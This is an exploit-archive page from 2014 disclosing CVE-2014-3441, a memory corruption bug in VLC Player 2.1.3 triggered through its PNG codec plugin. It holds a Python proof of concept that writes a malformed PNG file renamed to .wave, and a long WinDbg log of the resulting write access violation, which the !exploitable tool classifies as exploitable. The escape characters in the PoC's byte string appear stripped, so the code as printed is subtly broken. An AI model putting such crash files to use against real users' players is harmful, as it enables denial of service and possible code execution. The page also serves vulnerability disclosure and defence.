Home / exploits VLC Player 2.1.3 Memory Corruption
Posted on 09 May 2014
# Exploit Title: [VLCplayer memory corruption in latest Version 2.1.3 ] # Date: [2014/05/07] # Exploit Author: [Aryan Bayaninejad] # Linkedin : [https://www.linkedin.com/profile/view?id=276969082] # Vendor Homepage: [www.videolan.org] # Software Link: [ http://filehippo.com/download_vlc_32/download/b39c14a9f03cb9cf32eb01b1123b97bf/ ] # Version: [Version 2.1.3 and prior to that] # Tested on: [Windows Xp Sp 3 x86] # CVE : [2014-3441] details: VLCplayer latest version V 2.1.3 suffers from an memory corruption Vulnerability via a malformed .png file format when load codeclibpng_plugin.dll, you can change file extention to .wave Poc: #!/usr/bin/python data = "x89x50x4Ex47x0Dx0Ax1Ax0Ax00x00x00x0Dx49x48x44x52x7FxFFxFFxFFx00x00x01x02x01x03x00x00x00xBAx1BxD8x84x00x00x00x03x50x4Cx54x45xFFxFFxFFxA7xC4x1BxC8x00x00x00x01x74x52x4Ex53x00x40xE6xD8x66x00x68x92x01x49x44x41x54xFFx05x3Ax92x65x41x71x68x42x49x45x4Ex44xAEx42x60x82" outfile = file("poc.wave", 'wb') outfile.write(data) outfile.close() print "Created Poc" windbg result: Microsoft (R) Windows Debugger Version 6.2.9200.16384 X86 Copyright (c) Microsoft Corporation. All rights reserved. CommandLine: "C:Program FilesVideoLANVLCvlc.exe" Symbol search path is: *** Invalid *** **************************************************************************** * Symbol loading may be unreliable without a symbol search path. * * Use .symfix to have the debugger choose a symbol path. * * After setting your symbol path, use .reload to refresh symbol locations. * **************************************************************************** Executable search path is: ModLoad: 00400000 00426000 image00400000 ModLoad: 7c900000 7c9af000 ntdll.dll ModLoad: 7c800000 7c8f6000 C:WINDOWSsystem32kernel32.dll ModLoad: 6a300000 6a324000 C:Program FilesVideoLANVLClibvlc.dll ModLoad: 6a540000 6a791000 C:Program FilesVideoLANVLClibvlccore.dll ModLoad: 77dd0000 77e6b000 C:WINDOWSsystem32ADVAPI32.dll ModLoad: 77e70000 77f02000 C:WINDOWSsystem32RPCRT4.dll ModLoad: 77fe0000 77ff1000 C:WINDOWSsystem32Secur32.dll ModLoad: 77c10000 77c68000 C:WINDOWSsystem32msvcrt.dll ModLoad: 7c9c0000 7d1d7000 C:WINDOWSsystem32SHELL32.DLL ModLoad: 77f10000 77f59000 C:WINDOWSsystem32GDI32.dll ModLoad: 7e410000 7e4a1000 C:WINDOWSsystem32USER32.dll ModLoad: 77f60000 77fd6000 C:WINDOWSsystem32SHLWAPI.dll ModLoad: 76b40000 76b6d000 C:WINDOWSsystem32WINMM.DLL ModLoad: 71ab0000 71ac7000 C:WINDOWSsystem32WS2_32.dll ModLoad: 71aa0000 71aa8000 C:WINDOWSsystem32WS2HELP.dll ModLoad: 76bf0000 76bfb000 C:WINDOWSsystem32PSAPI.DLL ModLoad: 771b0000 7725a000 C:WINDOWSsystem32WININET.DLL ModLoad: 77a80000 77b15000 C:WINDOWSsystem32CRYPT32.dll ModLoad: 77b20000 77b32000 C:WINDOWSsystem32MSASN1.dll ModLoad: 77120000 771ab000 C:WINDOWSsystem32OLEAUT32.dll ModLoad: 774e0000 7761d000 C:WINDOWSsystem32ole32.dll (250.c1c): Break instruction exception - code 80000003 (first chance) *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll - eax=00351eb4 ebx=7ffde000 ecx=00000006 edx=00000040 esi=00351f48 edi=00351eb4 eip=7c90120e esp=0022fb20 ebp=0022fc94 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 ntdll!DbgBreakPoint: 7c90120e cc int 3 0:000> g ModLoad: 76390000 763ad000 C:WINDOWSsystem32IMM32.DLL ModLoad: 629c0000 629c9000 C:WINDOWSsystem32LPK.DLL ModLoad: 74d90000 74dfb000 C:WINDOWSsystem32USP10.dll ModLoad: 773d0000 774d3000 C:WINDOWSWinSxSx86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83comctl32.dll ModLoad: 5ad70000 5ada8000 C:WINDOWSsystem32uxtheme.dll ModLoad: 74720000 7476c000 C:WINDOWSsystem32MSCTF.dll ModLoad: 77c00000 77c08000 C:WINDOWSsystem32version.dll ModLoad: 755c0000 755ee000 C:WINDOWSsystem32msctfime.ime ModLoad: 10000000 10008000 C:Program FilesInternet Download Manageridmmkb.dll ModLoad: 64fc0000 65008000 C:Program FilesVideoLANVLCpluginsaccesslibdshow_plugin.dll ModLoad: 6aac0000 6aacf000 C:Program FilesVideoLANVLCpluginsaudio_outputlibdirectsound_plugin.dll ModLoad: 6e980000 6e990000 C:Program FilesVideoLANVLCpluginsaudio_outputlibwaveout_plugin.dll ModLoad: 6a100000 6a119000 C:Program FilesVideoLANVLCpluginsvideo_outputlibdirectdraw_plugin.dll ModLoad: 6c400000 6c5f6000 C:Program FilesVideoLANVLCpluginsaccessliblibbluray_plugin.dll ModLoad: 68740000 68760000 C:Program FilesVideoLANVLCpluginsaccesslibaccess_bd_plugin.dll ModLoad: 6f440000 6f483000 C:Program FilesVideoLANVLCpluginsaccesslibdvdnav_plugin.dll ModLoad: 6b840000 6b85b000 C:Program FilesVideoLANVLCpluginsaccesslibaccess_vdr_plugin.dll ModLoad: 6f100000 6f114000 C:Program FilesVideoLANVLCpluginsaccesslibfilesystem_plugin.dll ModLoad: 68bc0000 68bd7000 C:Program FilesVideoLANVLCpluginsstream_filterlibsmooth_plugin.dll ModLoad: 64a00000 64a8b000 C:Program FilesVideoLANVLCpluginsstream_filterlibhttplive_plugin.dll ModLoad: 70680000 70736000 C:Program FilesVideoLANVLCpluginsstream_filterlibdash_plugin.dll ModLoad: 6ae40000 6ae64000 C:Program FilesVideoLANVLCpluginsaccesslibzip_plugin.dll ModLoad: 69e40000 69e52000 C:Program FilesVideoLANVLCpluginsaccesslibstream_filter_rar_plugin.dll ModLoad: 6d700000 6d70c000 C:Program FilesVideoLANVLCpluginsstream_filterlibrecord_plugin.dll ModLoad: 70240000 70267000 C:Program FilesVideoLANVLCpluginsdemuxlibplaylist_plugin.dll ModLoad: 6cd00000 6ce7a000 C:Program FilesVideoLANVLCpluginsmeta_enginelibtaglib_plugin.dll ModLoad: 66040000 66090000 C:Program FilesVideoLANVLCpluginslualiblua_plugin.dll ModLoad: 625c0000 626f9000 C:Program FilesVideoLANVLCpluginsmisclibxml_plugin.dll ModLoad: 73f10000 73f6c000 C:WINDOWSsystem32DSOUND.DLL ModLoad: 77c00000 77c08000 C:WINDOWSsystem32VERSION.dll ModLoad: 77920000 77a13000 C:WINDOWSsystem32setupapi.dll ModLoad: 76c30000 76c5e000 C:WINDOWSsystem32WINTRUST.dll ModLoad: 76c90000 76cb8000 C:WINDOWSsystem32IMAGEHLP.dll ModLoad: 77920000 77a13000 C:WINDOWSsystem32setupapi.dll ModLoad: 72d20000 72d29000 C:WINDOWSsystem32wdmaud.drv ModLoad: 77920000 77a13000 C:WINDOWSsystem32setupapi.dll ModLoad: 72d20000 72d29000 C:WINDOWSsystem32wdmaud.drv ModLoad: 77920000 77a13000 C:WINDOWSsystem32setupapi.dll ModLoad: 72d20000 72d29000 C:WINDOWSsystem32wdmaud.drv ModLoad: 77920000 77a13000 C:WINDOWSsystem32setupapi.dll ModLoad: 72d20000 72d29000 C:WINDOWSsystem32wdmaud.drv ModLoad: 77920000 77a13000 C:WINDOWSsystem32setupapi.dll ModLoad: 72d20000 72d29000 C:WINDOWSsystem32wdmaud.drv ModLoad: 77920000 77a13000 C:WINDOWSsystem32setupapi.dll ModLoad: 72d10000 72d18000 C:WINDOWSsystem32msacm32.drv ModLoad: 77be0000 77bf5000 C:WINDOWSsystem32MSACM32.dll ModLoad: 77bd0000 77bd7000 C:WINDOWSsystem32midimap.dll ModLoad: 77920000 77a13000 C:WINDOWSsystem32setupapi.dll ModLoad: 6ff40000 6ff55000 C:Program FilesVideoLANVLCpluginscontrollibhotkeys_plugin.dll ModLoad: 6e180000 6e191000 C:Program FilesVideoLANVLCpluginscontrollibglobalhotkeys_plugin.dll main libvlc: Running vlc with the default interface. Use 'cvlc' to use vlc without interface. ModLoad: 68e80000 6992e000 C:Program FilesVideoLANVLCpluginsguilibqt4_plugin.dll ModLoad: 763b0000 763f9000 C:WINDOWSsystem32COMDLG32.DLL ModLoad: 73000000 73026000 C:WINDOWSsystem32WINSPOOL.DRV ModLoad: 71ad0000 71ad9000 C:WINDOWSsystem32WSOCK32.DLL ModLoad: 769c0000 76a74000 C:WINDOWSsystem32userenv.dll ModLoad: 01a20000 01ce5000 C:WINDOWSsystem32xpsp2res.dll ModLoad: 5d090000 5d12a000 C:WINDOWSsystem32comctl32.dll ModLoad: 76360000 76370000 C:WINDOWSsystem32winsta.dll ModLoad: 5b860000 5b8b5000 C:WINDOWSsystem32NETAPI32.dll ModLoad: 77920000 77a13000 C:WINDOWSsystem32SETUPAPI.dll ModLoad: 6d6c0000 6d6f7000 C:Program FilesVideoLANVLCpluginsdemuxlibmp4_plugin.dll ModLoad: 6e040000 6e05e000 C:Program FilesVideoLANVLCpluginsdemuxlibavi_plugin.dll ModLoad: 68440000 68458000 C:Program FilesVideoLANVLCpluginsdemuxlibasf_plugin.dll ModLoad: 6c380000 6c39b000 C:Program FilesVideoLANVLCpluginsdemuxlibflacsys_plugin.dll ModLoad: 6ef40000 6ef4e000 C:Program FilesVideoLANVLCpluginsdemuxlibes_plugin.dll es demux error: cannot peek es demux error: cannot peek ModLoad: 011e0000 011fa000 C:Program FilesVideoLANVLCpluginsdemuxlibmpc_plugin.dll ModLoad: 6c2c0000 6c2cd000 C:Program FilesVideoLANVLCpluginsdemuxlibtta_plugin.dll ModLoad: 62380000 6238e000 C:Program FilesVideoLANVLCpluginsdemuxlibnuv_plugin.dll ModLoad: 67e00000 67e0d000 C:Program FilesVideoLANVLCpluginsdemuxlibwav_plugin.dll ModLoad: 03610000 036fc000 C:Program FilesVideoLANVLCpluginsdemuxlibsid_plugin.dll ModLoad: 6bf40000 6bf65000 C:Program FilesVideoLANVLCpluginsservices_discoverylibsap_plugin.dll ModLoad: 6f8c0000 6f8eb000 C:Program FilesVideoLANVLCpluginsdemuxlibogg_plugin.dll ModLoad: 6a840000 6a96f000 C:Program FilesVideoLANVLCpluginsdemuxlibmkv_plugin.dll ModLoad: 70b00000 70b0c000 C:Program FilesVideoLANVLCpluginsdemuxlibdirac_plugin.dll ModLoad: 6d8c0000 6d97b000 C:Program FilesVideoLANVLCpluginsaccessliblive555_plugin.dll ModLoad: 64740000 6474d000 C:Program FilesVideoLANVLCpluginsdemuxlibsmf_plugin.dll ModLoad: 6cbc0000 6cbcd000 C:Program FilesVideoLANVLCpluginsdemuxlibpva_plugin.dll ModLoad: 65300000 6530c000 C:Program FilesVideoLANVLCpluginsdemuxlibxa_plugin.dll ModLoad: 67500000 6750d000 C:Program FilesVideoLANVLCpluginsdemuxlibaiff_plugin.dll ModLoad: 6ce80000 6ce8d000 C:Program FilesVideoLANVLCpluginsdemuxlibvoc_plugin.dll ModLoad: 6fec0000 6fecc000 C:Program FilesVideoLANVLCpluginsdemuxlibau_plugin.dll ModLoad: 6b500000 6b56d000 C:Program FilesVideoLANVLCpluginsdemuxlibgme_plugin.dll ModLoad: 65280000 6528d000 C:Program FilesVideoLANVLCpluginsdemuxlibrawvid_plugin.dll ModLoad: 6c940000 6c94e000 C:Program FilesVideoLANVLCpluginsdemuxlibimage_plugin.dll ModLoad: 683c0000 6840f000 C:Program FilesVideoLANVLCpluginscodeclibpng_plugin.dll (250.b14): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:WINDOWSsystem32msvcrt.dll - *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:Program FilesVideoLANVLCpluginscodeclibpng_plugin.dll - eax=00000000 ebx=018dee98 ecx=03ffe8c8 edx=00000000 esi=018ded80 edi=018e5000 eip=77c47631 esp=029ff940 ebp=029ff980 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 msvcrt!memset+0x41: 77c47631 f3ab rep stos dword ptr es:[edi] 0:009> .load winext/msec.dll 0:009> !exploitable !exploitable 1.6.0.0 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:Program FilesVideoLANVLClibvlccore.dll - *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:Program FilesVideoLANVLCpluginsdemuxlibimage_plugin.dll - Exploitability Classification: EXPLOITABLE Recommended Bug Title: Exploitable - User Mode Write AV starting at msvcrt!memset+0x0000000000000041 (Hash=0xefdbe58f.0x255f6419) User mode write access violations that are not near NULL are exploitable.
